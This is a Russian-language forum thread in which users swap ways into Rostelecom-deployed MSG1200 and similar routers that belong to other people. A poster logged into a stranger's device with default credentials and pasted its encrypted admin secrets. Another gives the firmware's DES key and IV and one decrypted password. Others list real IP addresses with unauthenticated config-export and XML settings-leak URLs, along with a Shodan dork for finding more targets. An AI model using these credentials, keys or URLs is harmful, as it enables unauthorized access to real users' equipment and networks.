Угнал конфиг пока хозяин настраивал доступ Spoiler System Name Intelligent Multiservice Gateway Device Type MSG1200-GEC Device Serial Number 000000000953S14B22S0074G Hardware Version A.00 Software Version RCIOS-2.21 Sub Version 2.21.24.20140910 . Видимо настройки дефолтные, пролез с парой admin:admin 80(во время настройки). Ни у кого нет декрипта? Spoiler user administrator admin local secret Hg6MAD7MGTUEcoT9gHG+LhDc6E07QwG71SmiEodL/fQT/YirzsAURqDjk69469y authorized-table telecomadmin 1 user administrator useradmin local secret CIW6wsU811r3kwZZDvQLRGibh4KTcS3VrPKgb2oRwUEmC0VpH30kLaLAfYiCgow authorized-table useradmin 2 user administrator user local secret ApL2aPQqcrZactBE+OkHqo8jkGR7VYIvRzaWYWVRiPj49ZmfMdES679R03gf5ES authorized-table user 3 set preshared-key secret nCE5eHuFlIBOkTy4IM67XjjAKfHFtlQIxVVWF1aGx5ITpjVXsEffZND6liYQzbr У нас такие девайсы появились на местном диапазоне Ростелекома. К сожалению не успел пощупать. Устройство было перезагружено а пара сменена. Полный конфиг: https://yadi.sk/d/9bLpRb7h3NfYWL Откликаются на 80, 443 порт "rchttpd/1.0 (Web user login)"
Гугл говорит, что у ISG1000 есть уязвимость с неавторизованным доступом к конфигу: https://6l.143.203.86/system/maintenance/export.php?type=sc Проверьте, есть ли у этого.
Scan Router http://193.153.195.185:8080/TLF_Login.html la búsqueda no puede conseguir me puede ayudar, gracias
Посмотрел прошивку - зашифрованы DES CBC (key = "Venusutm", "iv" = "licenses"): Hg6MAD7MGTUEcoT9gHG+LhDc6E07QwG71SmiEodL/fQT/YirzsAURqDjk69469y - admin CIW6wsU811r3kwZZDvQLRGibh4KTcS3VrPKgb2oRwUEmC0VpH30kLaLAfYiCgow - useradmin ApL2aPQqcrZactBE+OkHqo8jkGR7VYIvRzaWYWVRiPj49ZmfMdES679R03gf5ES - user Для того выше по ссылке: TaEr4bGdyq7hXYZ5Fe5nr3LF/xqsiKmEJd/gw8US5zM2sK3Bk7Svj59Esdfi1Nn - yinhe@qwys8551
А ни кто и не настаивает, каждый выбирает для себя свой путь. Будь спокоен товарищ, соответствующие службы тоже просматривают такие форумы и делают соответствующие выводы..................
На известные школоhuckerские форумы еще осталось понести. И тред на дваче создать потом. Вангую появление пару десятков тысяч точек с задрочистыми паролями в базе))
https://www.shodan.io/search?query=TLF_Login.html&ref=os Login? Password? Нужны образцы, доступные извне, либо дорк на Shodan.
Не нашёл в Shodan уязвимых, с данными admin:1234. А вот тут нашёл уязвимость! Можно получить настройки XML без авторизации: http://79.108.31.148:8080/xml/../xml/CmgwWirelessSecurity.xml http://79.108.31.148:8080/xml/../xml/CmgwWirelessWPS.xml и т.д. Естественно добавил.
Привет! Роутер скан не видит роутер, определяет его как веб сервер http://5.3.116.80/ https://prnt.sc/gxl138 https://prnt.sc/gxl0z4